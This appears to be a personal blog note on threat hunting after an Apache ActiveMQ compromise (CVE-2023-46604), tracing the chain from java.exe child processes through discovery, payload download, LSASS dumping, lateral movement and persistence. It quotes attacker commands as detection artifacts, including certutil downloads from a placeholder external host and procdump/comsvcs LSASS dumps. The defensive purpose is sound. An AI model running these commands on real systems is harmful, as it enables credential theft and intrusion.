Note: Like the previous post, I wrote this down for myself while going through this course by Leszek Mis.
Assume an internet-facing Apache ActiveMQ server has been exploited (CVE-2023-46604). Start the hunt from that host and move outward. The attacker path is predictable: execution → discovery → credential access → lateral movement → persistence.
First thing to check is execution from the Java process. The exploit results in command execution through java.exe (ActiveMQ). That process should not be spawning shells or LOLbins. Hunt for child processes of java.exe or the ActiveMQ service account.
Example process chain to investigate:
java.exe
└─ cmd.exe
└─ certutil.exe -urlcache -f http://<external>/payload.exe
or
java.exe └─ powershell.exe -enc <payload>
Telemetry sources that expose this quickly:
EDR process telemetry, Sysmon Event 1, Windows 4688.
Once execution exists, attackers usually enumerate the environment. Hunt for bursts of discovery commands executed from the compromised host.
Examples:
whoami whoami /all ipconfig /all net user net group "domain admins" /domain nltest /dclist arp -a net view
Signals worth investigating:
multiple discovery commands executed within seconds or minutes, commands executed from cmd.exe or powershell.exe, parent process tracing back to java.exe.
Next step is payload delivery. Attackers frequently use built-in tools to fetch additional binaries.
Look for commands like:
certutil -urlcache -f powershell Invoke-WebRequest powershell iwr bitsadmin /transfer
Example artifact:
certutil.exe -urlcache -f http://<external>/a.exe C:\ProgramData\a.exe
Hunt for outbound HTTP from application servers, new executables written to temp or ProgramData, followed by process execution.
Credential access typically follows. The goal is access to LSASS.
Common activity includes:
procdump.exe -ma lsass rundll32.exe comsvcs.dll MiniDump
Detection signals include processes accessing lsass.exe, abnormal handle access, or memory dump files appearing on disk. Sysmon Event 10 and EDR memory alerts usually expose this stage.
Once credentials exist, the compromised server becomes a pivot. Hunt for lateral movement originating from the application server.
Examples:
wmic /node:<host> process call create
psexec \\host cmd.exe
Another common signal is authentication bursts. A single server authenticating to multiple internal systems within a short time window.
Example pattern:
ActiveMQ01 → DC01
ActiveMQ01 → FILE01
ActiveMQ01 → APP02Application servers rarely perform administrative authentication across multiple hosts.
Finally check persistence mechanisms created shortly after compromise. Common artifacts include scheduled tasks and services.
Example:
TaskName: UpdateService Command: powershell -encodedcommand <payload> Creator: service account
Creation of scheduled tasks invoking PowerShell or scripts outside maintenance windows is a strong signal.
The hunt should focus on the sequence rather than individual events.
java.exe → shell execution shell → discovery commands shell → payload download payload → LSASS access compromised host → lateral authentication
Single events can be benign, but the chain is not.